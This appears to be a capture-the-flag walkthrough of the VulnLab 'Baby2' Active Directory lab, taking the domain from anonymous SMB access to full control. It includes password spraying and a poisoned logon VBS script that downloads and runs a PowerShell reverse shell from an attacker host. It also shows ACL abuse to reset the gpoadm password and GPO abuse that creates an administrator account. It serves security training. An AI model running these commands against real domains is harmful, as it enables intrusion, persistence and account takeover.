VL-Baby2

,

Vulnlab - Hack The Box Baby2: Active Directory Exploitation Through Weak Credentials and Group Policy Object Abuse

In this comprehensive VulnLab - Hack The Box walkthrough, I’ll demonstrate how to penetrate the “Baby2” domain environment by exploiting a series of vulnerabilities leading to complete domain compromise. Starting with anonymous SMB access and weak password policies, we’ll progress through login script manipulation for initial access, lateral movement via domain user enumeration, and ultimately achieve domain administrator privileges through WriteDacl abuse and Group Policy Object exploitation. This penetration test showcases several real-world Active Directory attack vectors including guest account enumeration, password spraying attacks, VBS script injection, domain privilege escalation through ACL manipulation, and GPO abuse for administrative access. The techniques demonstrated highlight common security misconfigurations in Windows environments that penetration testers should look for during enterprise assessments.

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-14 23:10:17Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory 
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory 
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory 
3269/tcp open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory 
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2025-03-14T23:11:42+00:00; -2h00m00s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: BABY2
|   NetBIOS_Domain_Name: BABY2
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: baby2.vl
|   DNS_Computer_Name: dc.baby2.vl
|   DNS_Tree_Name: baby2.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-03-14T23:11:01+00:00

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -2h00m00s, deviation: 0s, median: -2h00m00s
| smb2-time: 
|   date: 2025-03-14T23:11:04
|_  start_date: N/A

User

Shares

1
netexec smb 10.10.89.250 -u 'guest' -p '' --shares

shares-acess

NETLOGON

Looking into the Netlogon share we find a login.vbs

1
smbclient  //10.10.89.250/NETLOGON -U 'guest'

netlogon

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
Sub MapNetworkShare(sharePath, driveLetter)
    Dim objNetwork
    Set objNetwork = CreateObject("WScript.Network")    
  
    ' Check if the drive is already mapped
    Dim mappedDrives
    Set mappedDrives = objNetwork.EnumNetworkDrives
    Dim isMapped
    isMapped = False
    For i = 0 To mappedDrives.Count - 1 Step 2
        If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then
            isMapped = True
            Exit For
        End If
    Next
    
    If isMapped Then
        objNetwork.RemoveNetworkDrive driveLetter & ":", True, True
    End If
    
    objNetwork.MapNetworkDrive driveLetter & ":", sharePath
    
    If Err.Number = 0 Then
        WScript.Echo "Mapped " & driveLetter & ": to " & sharePath
    Else
        WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description
    End If
    
    Set objNetwork = Nothing
End Sub

MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"

Apps

On the Apps share we find a changelog and a .lnk file pointing into the /SYSVOL/scripts/ login.vbs

1
smbclient  //10.10.89.250/apps -U 'guest'

apps-share

CHANGELOG:

1
2
3
4
5
6
7
[0.2]

- Added automated drive mapping

[0.1]

- Rolled out initial version of the domain logon script

Home

1
smbclient //10.10.89.250/homes -U 'guest'

home-share
Possible Usernames:

1
2
3
4
5
6
7
8
9
10
11
Amelia.Griffiths
Carl.Moore
Harry.Shaw
Joan.Jennings
Joel.Hurst
Kieran.Mitchell
library
Lynda.Bailey
Mohammed.Harris
Nicola.Lamb
Ryan.Jenkins

Also we can find all of the usernames using lookupsid:

1
impacket-lookupsid guest@10.10.89.250 -no-pass
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
1000: BABY2\DC$ (SidTypeUser)
1101: BABY2\DnsAdmins (SidTypeAlias)
1102: BABY2\DnsUpdateProxy (SidTypeGroup)
1103: BABY2\gpoadm (SidTypeUser)
1104: BABY2\office (SidTypeGroup)
1105: BABY2\Joan.Jennings (SidTypeUser)
1106: BABY2\Mohammed.Harris (SidTypeUser)
1107: BABY2\Harry.Shaw (SidTypeUser)
1108: BABY2\Carl.Moore (SidTypeUser)
1109: BABY2\Ryan.Jenkins (SidTypeUser)
1110: BABY2\Kieran.Mitchell (SidTypeUser)
1111: BABY2\Nicola.Lamb (SidTypeUser)
1112: BABY2\Lynda.Bailey (SidTypeUser)
1113: BABY2\Joel.Hurst (SidTypeUser)
1114: BABY2\Amelia.Griffiths (SidTypeUser)
1602: BABY2\library (SidTypeUser)
2601: BABY2\legacy (SidTypeGroup)

Foothold

After some password spraying we can see that the user library and Carl.Moore have the same password as their usernames and now we get more access to the shares

1
netexec smb 10.10.109.97 -u usernames.txt  -p usernames.txt --no-bruteforce --continue-on-success

smb-users-access

1
netexec smb 10.10.109.97 -u "Carl.Moore" -p "Carl.Moore" --shares

carl.more-shares
We got Read on SYSVOL also now we can READ and WRITE on home, docs, and app share!

Bloodhound

Also now we have ldap access so we will run bloodhound-python or netexec to get a view of the domain.

1
netexec ldap 10.10.89.250 -u 'library' -p 'library'  --bloodhound --dns-server 10.10.89.250 -c All --dns-tcp

possible-path

LOGIN.VBS

We will be changing the login.vbs script to the one below so we can get a shell:

1
smbclient //10.10.109.97/SYSVOL -U 'Carl.Moore'
1
get login.vbs

Now we change the login.vbs to:

1
2
Set oShell = CreateObject("WScript.Shell")
oShell.Run("powershell.exe -nop -w hidden -ep bypass -c IEX(IWR http://10.8.5.195:8080/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.8.5.195 3001")

Here is the ps1 shell I use: https://github.com/antonioCoco/ConPtyShell

And start our listener and wait for someone to login

1
stty raw -echo; (stty size; cat) | nc -lvnp 3001

ROOT

Shell as Amelia.Griffiths

shell-amelina

We noticed that Amelia was part of the legacy group. Earlier we identified that the legacy group has WriteDacl over the GPOADM user. Following the bloodhound walkthrough, first we give the legacy group GenericAll permission over GPOADM

1
Add-DomainObjectAcl -TargetIdentity "GPOADM" -PrincipalIdentity legacy -Domain baby2.vl -Rights All -Verbose

genericall
Now that we have GenericAll we changed the password of the GPOADM:

1
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
1
Set-DomainUserPassword -Identity "GPOADM" -AccountPassword $UserPassword

GPO Abuse

As we saw earlier, GPOADM has GenericAll over the Default Domain Policy so we will use a tool named pyGPOAbuse to help us exploit it. https://github.com/Hackndo/pyGPOAbuse

We grab the GPO-ID and then we will run the python file that creates a user.
gpo-id

1
python3 pygpoabuse.py 'baby2.vl/gpoadm:Password123!' -gpo-id '6AC1786C-016F-11D2-945F-00C04FB984F9' -f

After running the command we need to gpupdate so the changes get applied

1
gpupdate /force

And we will see a new user that we created john:H4x00r123.. in the local administrators group:
john-user

1
evil-winrm -i 10.10.109.97 -u 'john' -p 'H4x00r123..'

https://api.vulnlab.com/api/v1/share?id=762ae368-a3d3-42da-810c-4f17964e01fb